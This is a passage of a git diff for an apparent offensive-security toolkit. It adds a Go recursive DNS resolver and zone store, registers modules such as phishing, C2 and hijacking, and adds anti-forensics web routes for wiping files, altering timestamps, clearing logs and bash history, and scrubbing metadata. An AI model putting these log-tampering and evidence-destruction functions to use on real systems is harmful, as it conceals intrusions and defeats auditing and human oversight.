rr.resolve(cnameRR.Target, qtype, depth+1) + if cResp != nil { + // Prepend the CNAME to the answer + cResp.Answer = append([]dns.RR{cnameRR}, cResp.Answer...) + return cResp + } + } + return resp + } + + // NXDOMAIN — name doesn't exist + if resp.Rcode == dns.RcodeNameError { + return resp + } + + // NOERROR with no answer and no NS in authority = we're done + if len(resp.Ns) == 0 && len(resp.Answer) == 0 { + return resp + } + + // Referral: extract NS records from authority section + var newNS []string + var nsNames []string + for _, rr := range resp.Ns { + if ns, ok := rr.(*dns.NS); ok { + nsNames = append(nsNames, ns.Ns) + } + } + + if len(nsNames) == 0 { + // SOA in authority = negative response from authoritative server + for _, rr := range resp.Ns { + if _, ok := rr.(*dns.SOA); ok { + return resp + } + } + return resp + } + + // Try to get IPs from the additional section (glue records) + glue := make(map[string]string) + for _, rr := range resp.Extra { + if a, ok := rr.(*dns.A); ok { + glue[strings.ToLower(a.Hdr.Name)] = a.A.String() + ":53" + } + } + + for _, nsName := range nsNames { + key := strings.ToLower(dns.Fqdn(nsName)) + if ip, ok := glue[key]; ok { + newNS = append(newNS, ip) + } + } + + // If no glue, resolve NS names ourselves + if len(newNS) == 0 { + for _, nsName := range nsNames { + ips := rr.resolveNSName(nsName, depth+1) + newNS = append(newNS, ips...) + if len(newNS) >= 3 { + break // Enough NS IPs + } + } + } + + if len(newNS) == 0 { + log.Printf("[resolver] no NS IPs found for delegation of %s", name) + return nil + } + + // Cache the delegation + zone := extractZone(resp.Ns) + if zone != "" { + rr.cacheNS(zone, newNS) + } + + nameservers = newNS + } + + return nil +} + +// resolveNSName resolves a nameserver hostname to its IP(s). +func (rr *RecursiveResolver) resolveNSName(nsName string, depth int) []string { + resp := rr.resolve(nsName, dns.TypeA, depth) + if resp == nil { + return nil + } + var ips []string + for _, ans := range resp.Answer { + if a, ok := ans.(*dns.A); ok { + ips = append(ips, a.A.String()+":53") + } + } + return ips +} + +// queryServers sends a query to a list of nameservers, returns first valid response. +func (rr *RecursiveResolver) queryServers(servers []string, name string, qtype uint16) *dns.Msg { + msg := new(dns.Msg) + msg.SetQuestion(dns.Fqdn(name), qtype) + msg.RecursionDesired = false // We're doing iterative resolution + + for _, server := range servers { + resp, _, err := rr.client.Exchange(msg, server) + if err != nil { + continue + } + if resp != nil { + return resp + } + } + + // Retry with TCP for truncated responses + msg.RecursionDesired = false + tcpClient := &dns.Client{Net: "tcp", Timeout: rr.timeout} + for _, server := range servers { + resp, _, err := tcpClient.Exchange(msg, server) + if err != nil { + continue + } + if resp != nil { + return resp + } + } + + return nil +} + +// queryUpstreamDoT sends a query to an upstream server via DNS-over-TLS (port 853). +func (rr *RecursiveResolver) QueryUpstreamDoT(req *dns.Msg, server string) (*dns.Msg, error) { + // Extract IP from server address (may include :53) + ip := server + if idx := strings.LastIndex(ip, ":"); idx >= 0 { + ip = ip[:idx] + } + + // Get TLS server name for certificate validation + serverName, ok := knownDoTServers[ip] + if !ok { + serverName = ip // Use IP as fallback (less secure, but works) + } + + dotAddr := ip + ":853" + client := &dns.Client{ + Net: "tcp-tls", + Timeout: 5 * time.Second, + TLSConfig: &tls.Config{ + ServerName: serverName, + MinVersion: tls.VersionTLS12, + }, + } + + msg := req.Copy() + msg.RecursionDesired = true + + resp, _, err := client.Exchange(msg, dotAddr) + return resp, err +} + +// queryUpstreamDoH sends a query to an upstream server via DNS-over-HTTPS (RFC 8484). +func (rr *RecursiveResolver) QueryUpstreamDoH(req *dns.Msg, server string) (*dns.Msg, error) { + // Extract IP from server address + ip := server + if idx := strings.LastIndex(ip, ":"); idx >= 0 { + ip = ip[:idx] + } + + // Find the DoH endpoint URL + endpoint, ok := knownDoHEndpoints[ip] + if !ok { + return nil, fmt.Errorf("no DoH endpoint known for %s", ip) + } + + // Encode DNS message as wire format + msg := req.Copy() + msg.RecursionDesired = true + wireMsg, err := msg.Pack() + if err != nil { + return nil, fmt.Errorf("pack DNS message: %w", err) + } + + // POST as application/dns-message (RFC 8484) + httpReq, err := http.NewRequest("POST", endpoint, bytes.NewReader(wireMsg)) + if err != nil { + return nil, fmt.Errorf("create HTTP request: %w", err) + } + httpReq.Header.Set("Content-Type", "application/dns-message") + httpReq.Header.Set("Accept", "application/dns-message") + + httpResp, err := rr.dohHTTP.Do(httpReq) + if err != nil { + return nil, fmt.Errorf("DoH request to %s: %w", endpoint, err) + } + defer httpResp.Body.Close() + + if httpResp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("DoH response status %d from %s", httpResp.StatusCode, endpoint) + } + + body, err := io.ReadAll(httpResp.Body) + if err != nil { + return nil, fmt.Errorf("read DoH response: %w", err) + } + + resp := new(dns.Msg) + if err := resp.Unpack(body); err != nil { + return nil, fmt.Errorf("unpack DoH response: %w", err) + } + + return resp, nil +} + +// queryUpstreamEncrypted tries DoH first (if enabled), then DoT, then plain. +func (rr *RecursiveResolver) queryUpstreamEncrypted(req *dns.Msg, server string) (*dns.Msg, string, error) { + ip := server + if idx := strings.LastIndex(ip, ":"); idx >= 0 { + ip = ip[:idx] + } + + // Try DoH if enabled and we know the endpoint + if rr.EnableDoH { + if _, ok := knownDoHEndpoints[ip]; ok { + resp, err := rr.QueryUpstreamDoH(req, server) + if err == nil && resp != nil { + return resp, "doh", nil + } + log.Printf("[resolver] DoH failed for %s: %v, falling back", ip, err) + } + } + + // Try DoT if enabled + if rr.EnableDoT { + resp, err := rr.QueryUpstreamDoT(req, server) + if err == nil && resp != nil { + return resp, "dot", nil + } + log.Printf("[resolver] DoT failed for %s: %v, falling back", ip, err) + } + + // Plain DNS fallback + c := &dns.Client{Timeout: 5 * time.Second} + resp, _, err := c.Exchange(req, server) + if err != nil { + return nil, "plain", err + } + return resp, "plain", nil +} + +// findBestNS finds the closest cached NS for the given name, or returns root servers. +func (rr *RecursiveResolver) findBestNS(name string) []string { + rr.nsCacheMu.RLock() + defer rr.nsCacheMu.RUnlock() + + // Walk up the domain name + labels := dns.SplitDomainName(name) + for i := 0; i < len(labels); i++ { + zone := dns.Fqdn(strings.Join(labels[i:], ".")) + if ns, ok := rr.nsCache[zone]; ok && len(ns) > 0 { + return ns + } + } + + return rootServers +} + +// cacheNS stores nameserver IPs for a zone. +func (rr *RecursiveResolver) cacheNS(zone string, servers []string) { + rr.nsCacheMu.Lock() + rr.nsCache[dns.Fqdn(zone)] = servers + rr.nsCacheMu.Unlock() +} + +// extractZone gets the zone name from NS authority records. +func extractZone(ns []dns.RR) string { + for _, rr := range ns { + if nsRR, ok := rr.(*dns.NS); ok { + return nsRR.Hdr.Name + } + } + return "" +} + +// ResolveWithFallback tries recursive resolution, falls back to upstream forwarders. +// Now with DoT/DoH encryption support for upstream queries. +func (rr *RecursiveResolver) ResolveWithFallback(req *dns.Msg, upstream []string) *dns.Msg { + // Try full recursive first + resp := rr.Resolve(req) + if resp != nil && resp.Rcode != dns.RcodeServerFailure { + return resp + } + + // Fallback to upstream forwarders if configured — use encrypted transport + if len(upstream) > 0 { + for _, us := range upstream { + resp, mode, err := rr.queryUpstreamEncrypted(req, us) + if err == nil && resp != nil { + if mode != "plain" { + log.Printf("[resolver] upstream %s answered via %s", us, mode) + } + return resp + } + } + } + + return resp +} + +// GetEncryptionStatus returns the current encryption mode info. +func (rr *RecursiveResolver) GetEncryptionStatus() map[string]interface{} { + status := map[string]interface{}{ + "dot_enabled": rr.EnableDoT, + "doh_enabled": rr.EnableDoH, + "dot_servers": knownDoTServers, + "doh_servers": knownDoHEndpoints, + } + if rr.EnableDoH { + status["preferred_mode"] = "doh" + } else if rr.EnableDoT { + status["preferred_mode"] = "dot" + } else { + status["preferred_mode"] = "plain" + } + return status +} + +// FlushNSCache clears all cached NS delegations. +func (rr *RecursiveResolver) FlushNSCache() { + rr.nsCacheMu.Lock() + rr.nsCache = make(map[string][]string) + rr.nsCacheMu.Unlock() +} + +// GetNSCache returns a copy of the NS delegation cache. +func (rr *RecursiveResolver) GetNSCache() map[string][]string { + rr.nsCacheMu.RLock() + defer rr.nsCacheMu.RUnlock() + result := make(map[string][]string, len(rr.nsCache)) + for k, v := range rr.nsCache { + cp := make([]string, len(v)) + copy(cp, v) + result[k] = cp + } + return result +} + +// String returns resolver info for debugging. +func (rr *RecursiveResolver) String() string { + rr.nsCacheMu.RLock() + defer rr.nsCacheMu.RUnlock() + mode := "plain" + if rr.EnableDoH { + mode = "DoH" + } else if rr.EnableDoT { + mode = "DoT" + } + return fmt.Sprintf("RecursiveResolver{cached_zones=%d, max_depth=%d, mode=%s}", len(rr.nsCache), rr.maxDepth, mode) +} diff --git a/services/dns-server/server/zones.go b/services/dns-server/server/zones.go new file mode 100644 index 0000000..0e1cca3 --- /dev/null +++ b/services/dns-server/server/zones.go @@ -0,0 +1,525 @@ +package server + +import ( + "encoding/json" + "fmt" + "net" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "github.com/miekg/dns" +) + +// RecordType represents supported DNS record types. +type RecordType string + +const ( + TypeA RecordType = "A" + TypeAAAA RecordType = "AAAA" + TypeCNAME RecordType = "CNAME" + TypeMX RecordType = "MX" + TypeTXT RecordType = "TXT" + TypeNS RecordType = "NS" + TypeSRV RecordType = "SRV" + TypePTR RecordType = "PTR" + TypeSOA RecordType = "SOA" +) + +// Record is a single DNS record. +type Record struct { + ID string `json:"id"` + Type RecordType `json:"type"` + Name string `json:"name"` + Value string `json:"value"` + TTL uint32 `json:"ttl"` + Priority uint16 `json:"priority,omitempty"` // MX, SRV + Weight uint16 `json:"weight,omitempty"` // SRV + Port uint16 `json:"port,omitempty"` // SRV +} + +// Zone represents a DNS zone with its records. +type Zone struct { + Domain string `json:"domain"` + SOA SOARecord `json:"soa"` + Records []Record `json:"records"` + DNSSEC bool `json:"dnssec"` + CreatedAt string `json:"created_at"` + UpdatedAt string `json:"updated_at"` +} + +// SOARecord holds SOA-specific fields. +type SOARecord struct { + PrimaryNS string `json:"primary_ns"` + AdminEmail string `json:"admin_email"` + Serial uint32 `json:"serial"` + Refresh uint32 `json:"refresh"` + Retry uint32 `json:"retry"` + Expire uint32 `json:"expire"` + MinTTL uint32 `json:"min_ttl"` +} + +// ZoneStore manages zones on disk and in memory. +type ZoneStore struct { + mu sync.RWMutex + zones map[string]*Zone + zonesDir string +} + +// NewZoneStore creates a store backed by a directory. +func NewZoneStore(dir string) *ZoneStore { + os.MkdirAll(dir, 0755) + return &ZoneStore{ + zones: make(map[string]*Zone), + zonesDir: dir, + } +} + +// LoadAll reads all zone files from disk. +func (s *ZoneStore) LoadAll() error { + entries, err := os.ReadDir(s.zonesDir) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + for _, e := range entries { + if filepath.Ext(e.Name()) != ".json" { + continue + } + data, err := os.ReadFile(filepath.Join(s.zonesDir, e.Name())) + if err != nil { + continue + } + var z Zone + if err := json.Unmarshal(data, &z); err != nil { + continue + } + s.zones[dns.Fqdn(z.Domain)] = &z + } + return nil +} + +// Save writes a zone to disk. +func (s *ZoneStore) Save(z *Zone) error { + z.UpdatedAt = time.Now().UTC().Format(time.RFC3339) + data, err := json.MarshalIndent(z, "", " ") + if err != nil { + return err + } + fname := filepath.Join(s.zonesDir, z.Domain+".json") + return os.WriteFile(fname, data, 0644) +} + +// Get returns a zone by domain. +func (s *ZoneStore) Get(domain string) *Zone { + s.mu.RLock() + defer s.mu.RUnlock() + return s.zones[dns.Fqdn(domain)] +} + +// List returns all zones. +func (s *ZoneStore) List() []*Zone { + s.mu.RLock() + defer s.mu.RUnlock() + result := make([]*Zone, 0, len(s.zones)) + for _, z := range s.zones { + result = append(result, z) + } + return result +} + +// Create adds a new zone. +func (s *ZoneStore) Create(domain string) (*Zone, error) { + fqdn := dns.Fqdn(domain) + s.mu.Lock() + defer s.mu.Unlock() + + if _, exists := s.zones[fqdn]; exists { + return nil, fmt.Errorf("zone %s already exists", domain) + } + + now := time.Now().UTC().Format(time.RFC3339) + z := &Zone{ + Domain: domain, + SOA: SOARecord{ + PrimaryNS: "ns1." + domain, + AdminEmail: "admin." + domain, + Serial: uint32(time.Now().Unix()), + Refresh: 3600, + Retry: 600, + Expire: 86400, + MinTTL: 300, + }, + Records: []Record{ + {ID: "ns1", Type: TypeNS, Name: domain + ".", Value: "ns1." + domain + ".", TTL: 3600}, + }, + CreatedAt: now, + UpdatedAt: now, + } + s.zones[fqdn] = z + return z, s.Save(z) +} + +// Delete removes a zone. +func (s *ZoneStore) Delete(domain string) error { + fqdn := dns.Fqdn(domain) + s.mu.Lock() + defer s.mu.Unlock() + + if _, exists := s.zones[fqdn]; !exists { + return fmt.Errorf("zone %s not found", domain) + } + delete(s.zones, fqdn) + fname := filepath.Join(s.zonesDir, domain+".json") + os.Remove(fname) + return nil +} + +// AddRecord adds a record to a zone. +func (s *ZoneStore) AddRecord(domain string, rec Record) error { + fqdn := dns.Fqdn(domain) + s.mu.Lock() + defer s.mu.Unlock() + + z, ok := s.zones[fqdn] + if !ok { + return fmt.Errorf("zone %s not found", domain) + } + + if rec.ID == "" { + rec.ID = fmt.Sprintf("r%d", time.Now().UnixNano()) + } + if rec.TTL == 0 { + rec.TTL = 300 + } + + z.Records = append(z.Records, rec) + z.SOA.Serial++ + return s.Save(z) +} + +// DeleteRecord removes a record by ID. +func (s *ZoneStore) DeleteRecord(domain, recordID string) error { + fqdn := dns.Fqdn(domain) + s.mu.Lock() + defer s.mu.Unlock() + + z, ok := s.zones[fqdn] + if !ok { + return fmt.Errorf("zone %s not found", domain) + } + + for i, r := range z.Records { + if r.ID == recordID { + z.Records = append(z.Records[:i], z.Records[i+1:]...) + z.SOA.Serial++ + return s.Save(z) + } + } + return fmt.Errorf("record %s not found", recordID) +} + +// UpdateRecord updates a record by ID. +func (s *ZoneStore) UpdateRecord(domain, recordID string, rec Record) error { + fqdn := dns.Fqdn(domain) + s.mu.Lock() + defer s.mu.Unlock() + + z, ok := s.zones[fqdn] + if !ok { + return fmt.Errorf("zone %s not found", domain) + } + + for i, r := range z.Records { + if r.ID == recordID { + rec.ID = recordID + z.Records[i] = rec + z.SOA.Serial++ + return s.Save(z) + } + } + return fmt.Errorf("record %s not found", recordID) +} + +// Lookup finds records matching a query name and type within all zones. +func (s *ZoneStore) Lookup(name string, qtype uint16) []dns.RR { + s.mu.RLock() + defer s.mu.RUnlock() + + fqdn := dns.Fqdn(name) + var results []dns.RR + + // Find the zone for this name + for zoneDomain, z := range s.zones { + if !dns.IsSubDomain(zoneDomain, fqdn) { + continue + } + // Check records + for _, rec := range z.Records { + recFQDN := dns.Fqdn(rec.Name) + if recFQDN != fqdn { + continue + } + if rr := recordToRR(rec, fqdn); rr != nil { + if qtype == dns.TypeANY || rr.Header().Rrtype == qtype { + results = append(results, rr) + } + } + } + // SOA for zone apex + if fqdn == zoneDomain && (qtype == dns.TypeSOA || qtype == dns.TypeANY) { + soa := &dns.SOA{ + Hdr: dns.RR_Header{Name: zoneDomain, Rrtype: dns.TypeSOA, Class: dns.ClassINET, Ttl: z.SOA.MinTTL}, + Ns: dns.Fqdn(z.SOA.PrimaryNS), + Mbox: dns.Fqdn(z.SOA.AdminEmail), + Serial: z.SOA.Serial, + Refresh: z.SOA.Refresh, + Retry: z.SOA.Retry, + Expire: z.SOA.Expire, + Minttl: z.SOA.MinTTL, + } + results = append(results, soa) + } + } + return results +} + +func recordToRR(rec Record, fqdn string) dns.RR { + hdr := dns.RR_Header{Name: fqdn, Class: dns.ClassINET, Ttl: rec.TTL} + + switch rec.Type { + case TypeA: + hdr.Rrtype = dns.TypeA + rr := &dns.A{Hdr: hdr} + rr.A = parseIP(rec.Value) + if rr.A == nil { + return nil + } + return rr + case TypeAAAA: + hdr.Rrtype = dns.TypeAAAA + rr := &dns.AAAA{Hdr: hdr} + rr.AAAA = parseIP(rec.Value) + if rr.AAAA == nil { + return nil + } + return rr + case TypeCNAME: + hdr.Rrtype = dns.TypeCNAME + return &dns.CNAME{Hdr: hdr, Target: dns.Fqdn(rec.Value)} + case TypeMX: + hdr.Rrtype = dns.TypeMX + return &dns.MX{Hdr: hdr, Preference: rec.Priority, Mx: dns.Fqdn(rec.Value)} + case TypeTXT: + hdr.Rrtype = dns.TypeTXT + return &dns.TXT{Hdr: hdr, Txt: []string{rec.Value}} + case TypeNS: + hdr.Rrtype = dns.TypeNS + return &dns.NS{Hdr: hdr, Ns: dns.Fqdn(rec.Value)} + case TypeSRV: + hdr.Rrtype = dns.TypeSRV + return &dns.SRV{Hdr: hdr, Priority: rec.Priority, Weight: rec.Weight, Port: rec.Port, Target: dns.Fqdn(rec.Value)} + case TypePTR: + hdr.Rrtype = dns.TypePTR + return &dns.PTR{Hdr: hdr, Ptr: dns.Fqdn(rec.Value)} + } + return nil +} + +func parseIP(s string) net.IP { + return net.ParseIP(s) +} + +// ExportZoneFile exports a zone in BIND zone file format. +func (s *ZoneStore) ExportZoneFile(domain string) (string, error) { + s.mu.RLock() + defer s.mu.RUnlock() + + z, ok := s.zones[dns.Fqdn(domain)] + if !ok { + return "", fmt.Errorf("zone %s not found", domain) + } + + var b strings.Builder + b.WriteString(fmt.Sprintf("; Zone file for %s\n", z.Domain)) + b.WriteString(fmt.Sprintf("; Exported at %s\n", time.Now().UTC().Format(time.RFC3339))) + b.WriteString(fmt.Sprintf("$ORIGIN %s.\n", z.Domain)) + b.WriteString(fmt.Sprintf("$TTL %d\n\n", z.SOA.MinTTL)) + + // SOA + b.WriteString(fmt.Sprintf("@ IN SOA %s. %s. (\n", z.SOA.PrimaryNS, z.SOA.AdminEmail)) + b.WriteString(fmt.Sprintf(" %d ; serial\n", z.SOA.Serial)) + b.WriteString(fmt.Sprintf(" %d ; refresh\n", z.SOA.Refresh)) + b.WriteString(fmt.Sprintf(" %d ; retry\n", z.SOA.Retry)) + b.WriteString(fmt.Sprintf(" %d ; expire\n", z.SOA.Expire)) + b.WriteString(fmt.Sprintf(" %d ; minimum TTL\n)\n\n", z.SOA.MinTTL)) + + // Records grouped by type + for _, rec := range z.Records { + name := rec.Name + // Make relative to origin + suffix := "." + z.Domain + "." + if strings.HasSuffix(name, suffix) { + name = strings.TrimSuffix(name, suffix) + } else if name == z.Domain+"." { + name = "@" + } + + switch rec.Type { + case TypeMX: + b.WriteString(fmt.Sprintf("%-24s %d IN MX %d %s\n", name, rec.TTL, rec.Priority, rec.Value)) + case TypeSRV: + b.WriteString(fmt.Sprintf("%-24s %d IN SRV %d %d %d %s\n", name, rec.TTL, rec.Priority, rec.Weight, rec.Port, rec.Value)) + default: + b.WriteString(fmt.Sprintf("%-24s %d IN %-6s %s\n", name, rec.TTL, rec.Type, rec.Value)) + } + } + + return b.String(), nil +} + +// ImportZoneFile parses a BIND-style zone file and adds records. +// Returns number of records added. +func (s *ZoneStore) ImportZoneFile(domain, content string) (int, error) { + fqdn := dns.Fqdn(domain) + s.mu.Lock() + defer s.mu.Unlock() + + z, ok := s.zones[fqdn] + if !ok { + return 0, fmt.Errorf("zone %s not found — create it first", domain) + } + + added := 0 + zp := dns.NewZoneParser(strings.NewReader(content), dns.Fqdn(domain), "") + for rr, ok := zp.Next(); ok; rr, ok = zp.Next() { + hdr := rr.Header() + rec := Record{ + ID: fmt.Sprintf("imp%d", time.Now().UnixNano()+int64(added)), + Name: hdr.Name, + TTL: hdr.Ttl, + } + + switch v := rr.(type) { + case *dns.A: + rec.Type = TypeA + rec.Value = v.A.String() + case *dns.AAAA: + rec.Type = TypeAAAA + rec.Value = v.AAAA.String() + case *dns.CNAME: + rec.Type = TypeCNAME + rec.Value = v.Target + case *dns.MX: + rec.Type = TypeMX + rec.Value = v.Mx + rec.Priority = v.Preference + case *dns.TXT: + rec.Type = TypeTXT + rec.Value = strings.Join(v.Txt, " ") + case *dns.NS: + rec.Type = TypeNS + rec.Value = v.Ns + case *dns.SRV: + rec.Type = TypeSRV + rec.Value = v.Target + rec.Priority = v.Priority + rec.Weight = v.Weight + rec.Port = v.Port + case *dns.PTR: + rec.Type = TypePTR + rec.Value = v.Ptr + default: + continue // Skip unsupported types + } + + z.Records = append(z.Records, rec) + added++ + } + + if added > 0 { + z.SOA.Serial++ + s.Save(z) + } + return added, nil +} + +// CloneZone duplicates a zone under a new domain. +func (s *ZoneStore) CloneZone(srcDomain, dstDomain string) (*Zone, error) { + srcFQDN := dns.Fqdn(srcDomain) + dstFQDN := dns.Fqdn(dstDomain) + + s.mu.Lock() + defer s.mu.Unlock() + + src, ok := s.zones[srcFQDN] + if !ok { + return nil, fmt.Errorf("source zone %s not found", srcDomain) + } + if _, exists := s.zones[dstFQDN]; exists { + return nil, fmt.Errorf("destination zone %s already exists", dstDomain) + } + + now := time.Now().UTC().Format(time.RFC3339) + z := &Zone{ + Domain: dstDomain, + SOA: SOARecord{ + PrimaryNS: strings.Replace(src.SOA.PrimaryNS, srcDomain, dstDomain, -1), + AdminEmail: strings.Replace(src.SOA.AdminEmail, srcDomain, dstDomain, -1), + Serial: uint32(time.Now().Unix()), + Refresh: src.SOA.Refresh, + Retry: src.SOA.Retry, + Expire: src.SOA.Expire, + MinTTL: src.SOA.MinTTL, + }, + CreatedAt: now, + UpdatedAt: now, + } + + // Clone records, replacing domain references + for _, rec := range src.Records { + newRec := rec + newRec.ID = fmt.Sprintf("c%d", time.Now().UnixNano()) + newRec.Name = strings.Replace(rec.Name, srcDomain, dstDomain, -1) + newRec.Value = strings.Replace(rec.Value, srcDomain, dstDomain, -1) + z.Records = append(z.Records, newRec) + time.Sleep(time.Nanosecond) // Ensure unique IDs + } + + s.zones[dstFQDN] = z + return z, s.Save(z) +} + +// BulkAddRecords adds multiple records at once. +func (s *ZoneStore) BulkAddRecords(domain string, records []Record) (int, error) { + fqdn := dns.Fqdn(domain) + s.mu.Lock() + defer s.mu.Unlock() + + z, ok := s.zones[fqdn] + if !ok { + return 0, fmt.Errorf("zone %s not found", domain) + } + + added := 0 + for _, rec := range records { + if rec.ID == "" { + rec.ID = fmt.Sprintf("b%d", time.Now().UnixNano()+int64(added)) + } + if rec.TTL == 0 { + rec.TTL = 300 + } + z.Records = append(z.Records, rec) + added++ + } + + if added > 0 { + z.SOA.Serial++ + s.Save(z) + } + return added, nil +} diff --git a/setup_msi.py b/setup_msi.py index dd47016..3b69e0c 100644 --- a/setup_msi.py +++ b/setup_msi.py @@ -52,6 +52,48 @@ build_exe_options = { 'web.routes.targets', 'web.routes.encmodules', 'web.routes.llm_trainer', 'web.routes.autonomy', + 'web.routes.loadtest', + 'web.routes.phishmail', + 'web.routes.dns_service', + 'web.routes.ipcapture', + 'web.routes.hack_hijack', + 'web.routes.password_toolkit', + 'web.routes.webapp_scanner', + 'web.routes.report_engine', + 'web.routes.net_mapper', + 'web.routes.c2_framework', + 'web.routes.wifi_audit', + 'web.routes.threat_intel', + 'web.routes.steganography', + 'web.routes.api_fuzzer', + 'web.routes.ble_scanner', + 'web.routes.forensics', + 'web.routes.rfid_tools', + 'web.routes.cloud_scan', + 'web.routes.malware_sandbox', + 'web.routes.log_correlator', + 'web.routes.anti_forensics', + 'modules.loadtest', + 'modules.phishmail', + 'modules.ipcapture', + 'modules.hack_hijack', + 'modules.password_toolkit', + 'modules.webapp_scanner', + 'modules.report_engine', + 'modules.net_mapper', + 'modules.c2_framework', + 'modules.wifi_audit', + 'modules.threat_intel', + 'modules.steganography', + 'modules.api_fuzzer', + 'modules.ble_scanner', + 'modules.forensics', + 'modules.rfid_tools', + 'modules.cloud_scan', + 'modules.malware_sandbox', + 'modules.log_correlator', + 'modules.anti_forensics', + 'core.dns_service', 'core.model_router', 'core.rules', 'core.autonomy', ], 'excludes': ['torch', 'transformers', diff --git a/web/app.py b/web/app.py index 11de41f..1ee2ba3 100644 --- a/web/app.py +++ b/web/app.py @@ -66,6 +66,27 @@ def create_app(): from web.routes.encmodules import encmodules_bp from web.routes.llm_trainer import llm_trainer_bp from web.routes.autonomy import autonomy_bp + from web.routes.loadtest import loadtest_bp + from web.routes.phishmail import phishmail_bp + from web.routes.dns_service import dns_service_bp + from web.routes.ipcapture import ipcapture_bp + from web.routes.hack_hijack import hack_hijack_bp + from web.routes.password_toolkit import password_toolkit_bp + from web.routes.webapp_scanner import webapp_scanner_bp + from web.routes.report_engine import report_engine_bp + from web.routes.net_mapper import net_mapper_bp + from web.routes.c2_framework import c2_framework_bp + from web.routes.wifi_audit import wifi_audit_bp + from web.routes.threat_intel import threat_intel_bp + from web.routes.steganography import steganography_bp + from web.routes.api_fuzzer import api_fuzzer_bp + from web.routes.ble_scanner import ble_scanner_bp + from web.routes.forensics import forensics_bp + from web.routes.rfid_tools import rfid_tools_bp + from web.routes.cloud_scan import cloud_scan_bp + from web.routes.malware_sandbox import malware_sandbox_bp + from web.routes.log_correlator import log_correlator_bp + from web.routes.anti_forensics import anti_forensics_bp app.register_blueprint(auth_bp) app.register_blueprint(dashboard_bp) @@ -91,6 +112,27 @@ def create_app(): app.register_blueprint(encmodules_bp) app.register_blueprint(llm_trainer_bp) app.register_blueprint(autonomy_bp) + app.register_blueprint(loadtest_bp) + app.register_blueprint(phishmail_bp) + app.register_blueprint(dns_service_bp) + app.register_blueprint(ipcapture_bp) + app.register_blueprint(hack_hijack_bp) + app.register_blueprint(password_toolkit_bp) + app.register_blueprint(webapp_scanner_bp) + app.register_blueprint(report_engine_bp) + app.register_blueprint(net_mapper_bp) + app.register_blueprint(c2_framework_bp) + app.register_blueprint(wifi_audit_bp) + app.register_blueprint(threat_intel_bp) + app.register_blueprint(steganography_bp) + app.register_blueprint(api_fuzzer_bp) + app.register_blueprint(ble_scanner_bp) + app.register_blueprint(forensics_bp) + app.register_blueprint(rfid_tools_bp) + app.register_blueprint(cloud_scan_bp) + app.register_blueprint(malware_sandbox_bp) + app.register_blueprint(log_correlator_bp) + app.register_blueprint(anti_forensics_bp) # Start network discovery advertising (mDNS + Bluetooth) try: diff --git a/web/routes/anti_forensics.py b/web/routes/anti_forensics.py new file mode 100644 index 0000000..ef52817 --- /dev/null +++ b/web/routes/anti_forensics.py @@ -0,0 +1,97 @@ +"""Anti-Forensics routes.""" +from flask import Blueprint, request, jsonify, render_template +from web.routes.auth_routes import login_required + +anti_forensics_bp = Blueprint('anti_forensics', __name__, url_prefix='/anti-forensics') + +def _get_mgr(): + from modules.anti_forensics import get_anti_forensics + return get_anti_forensics() + +@anti_forensics_bp.route('/') +@login_required +def index(): + return render_template('anti_forensics.html') + +@anti_forensics_bp.route('/capabilities') +@login_required +def capabilities(): + return jsonify(_get_mgr().get_capabilities()) + +@anti_forensics_bp.route('/delete/file', methods=['POST']) +@login_required +def delete_file(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().delete.secure_delete_file( + data.get('path', ''), data.get('passes', 3), data.get('method', 'random') + )) + +@anti_forensics_bp.route('/delete/directory', methods=['POST']) +@login_required +def delete_directory(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().delete.secure_delete_directory( + data.get('path', ''), data.get('passes', 3) + )) + +@anti_forensics_bp.route('/wipe', methods=['POST']) +@login_required +def wipe_free_space(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().delete.wipe_free_space(data.get('mount_point', ''))) + +@anti_forensics_bp.route('/timestamps', methods=['GET', 'POST']) +@login_required +def timestamps(): + if request.method == 'POST': + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().timestamps.set_timestamps( + data.get('path', ''), data.get('accessed'), data.get('modified') + )) + return jsonify(_get_mgr().timestamps.get_timestamps(request.args.get('path', ''))) + +@anti_forensics_bp.route('/timestamps/clone', methods=['POST']) +@login_required +def clone_timestamps(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().timestamps.clone_timestamps(data.get('source', ''), data.get('target', ''))) + +@anti_forensics_bp.route('/timestamps/randomize', methods=['POST']) +@login_required +def randomize_timestamps(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().timestamps.randomize_timestamps(data.get('path', ''))) + +@anti_forensics_bp.route('/logs') +@login_required +def list_logs(): + return jsonify(_get_mgr().logs.list_logs()) + +@anti_forensics_bp.route('/logs/clear', methods=['POST']) +@login_required +def clear_log(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().logs.clear_log(data.get('path', ''))) + +@anti_forensics_bp.route('/logs/remove', methods=['POST']) +@login_required +def remove_entries(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().logs.remove_entries(data.get('path', ''), data.get('pattern', ''))) + +@anti_forensics_bp.route('/logs/history', methods=['POST']) +@login_required +def clear_history(): + return jsonify(_get_mgr().logs.clear_bash_history()) + +@anti_forensics_bp.route('/scrub/image', methods=['POST']) +@login_required +def scrub_image(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().scrubber.scrub_image(data.get('path', ''), data.get('output'))) + +@anti_forensics_bp.route('/scrub/pdf', methods=['POST']) +@login_required +def scrub_pdf(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().scrubber.scrub_pdf_metadata(data.get('path', ''))) diff --git a/web/routes/api_fuzzer.py b/web/routes/api_fuzzer.py new file mode 100644 index 0000000..84eae57 --- /dev/null +++ b/web/routes/api_fuzzer.py @@ -0,0 +1,95 @@ +"""API Fuzzer routes.""" +from flask import Blueprint, request, jsonify, render_template +from web.routes.auth_routes import login_required + +api_fuzzer_bp = Blueprint('api_fuzzer', __name__, url_prefix='/api-fuzzer') + +def _get_fuzzer(): + from modules.api_fuzzer import get_api_fuzzer + return get_api_fuzzer() + +@api_fuzzer_bp.route('/') +@login_required +def index(): + return render_template('api_fuzzer.html') + +@api_fuzzer_bp.route('/discover', methods=['POST']) +@login_required +def discover(): + data = request.get_json(silent=True) or {} + job_id = _get_fuzzer().discover_endpoints( + data.get('base_url', ''), data.get('custom_paths') + ) + return jsonify({'ok': bool(job_id), 'job_id': job_id}) + 